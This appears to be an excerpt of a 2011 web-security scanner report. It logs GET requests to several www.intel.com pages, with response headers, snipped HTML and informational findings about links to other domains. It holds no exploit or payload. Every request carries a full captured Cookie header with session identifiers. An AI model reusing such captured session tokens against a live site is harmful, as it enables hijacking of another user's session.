GET /idf/index.htm?iid=subhdr+devctr_idf HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36661
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Attend The ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following links to other domains:
http://www.intc.com/
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /intel/companyinfo/index.htm?iid=subhdr+info HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:14 GMT Content-Length: 25926 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Intel's Corporate Values and Vision.</title>
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /intel/corpresponsibility/index.htm?iid=gg_about+intel_gcr HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:07 GMT Content-Length: 31356 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Intel Corporate Responsibility — With Leadership ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
GET /intel/rss.htm?iid=ftr+rss HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39033
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <!-- DOC-FACTORY Generated Tags BEGIN --> <TITLE>Intel RSS Feeds</TITLE> <meta name = "creation_date" co ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="Intel Business Feed" href="http://rss.intel.com/rss/intel-business-content.xml"> <link rel="alternate" type="application/rss+xml" title="Intel Investor Relations" href="http://apps.shareholder.com/rss/rss.aspx?companyid=INTC&channels=5148">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /itcenter/index.htm?iid=gg_work+home_it HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:36 GMT Content-Length: 30149 Connection: close
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us"> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /itcenter/industry/education/overview.htm?iid=subhdr+itc_edu HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39695
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us"> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /itcenter/industry/fsi/overview.htm?iid=subhdr+itc_fsi HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39772
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us"> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
GET /itcenter/itatintel/?iid=SEARCH HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 69396
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us"> ...[SNIP]... <p style="margin: 7px 10px; font-weight: bold;"><a href="http://itunes.apple.com/us/podcast/intel-it/id406217336" target="blank" title="Subscribe to Intel IT white papers and podcasts ">Subscribe to Intel IT white papers and podcasts ></a> ...[SNIP]... <p style="margin: 7px 10px; font-weight: bold;"><a href="http://www.brighttalk.com/community/data-center/channel/5360" target="blank" title="View our data center webcasts">View our data center webcasts ></a> ...[SNIP]... <p style="margin: 7px 10px 0 10px; font-weight: bold;"><a href="http://twitter.com/ITatIntel" target="blank" title="Follow Intel IT on Twitter">Follow Intel IT on Twitter ></a> ...[SNIP]... <li><a href="http://www.linuxfordevices.com/c/a/News/Intel-2011-tech-predictions/" title="Intel CIO helps predict top 11 trends for 2011" target="_blank">Intel CIO helps predict top 11 trends for 2011</a> ...[SNIP]... <li><a href="http://www-2.virtualevents365.com/intelipip/index.php?page=agenda" title="Virtual Seminar for IT Professionals" target="_blank">Virtual event for IT professionals (view now)</a> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
GET /itcenter/itatintel/index.htm?iid=subhdr+itc_itatintel HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 69396
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us"> ...[SNIP]... <p style="margin: 7px 10px; font-weight: bold;"><a href="http://itunes.apple.com/us/podcast/intel-it/id406217336" target="blank" title="Subscribe to Intel IT white papers and podcasts ">Subscribe to Intel IT white papers and podcasts ></a> ...[SNIP]... <p style="margin: 7px 10px; font-weight: bold;"><a href="http://www.brighttalk.com/community/data-center/channel/5360" target="blank" title="View our data center webcasts">View our data center webcasts ></a> ...[SNIP]... <p style="margin: 7px 10px 0 10px; font-weight: bold;"><a href="http://twitter.com/ITatIntel" target="blank" title="Follow Intel IT on Twitter">Follow Intel IT on Twitter ></a> ...[SNIP]... <li><a href="http://www.linuxfordevices.com/c/a/News/Intel-2011-tech-predictions/" title="Intel CIO helps predict top 11 trends for 2011" target="_blank">Intel CIO helps predict top 11 trends for 2011</a> ...[SNIP]... <li><a href="http://www-2.virtualevents365.com/intelipip/index.php?page=agenda" title="Virtual Seminar for IT Professionals" target="_blank">Virtual event for IT professionals (view now)</a> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
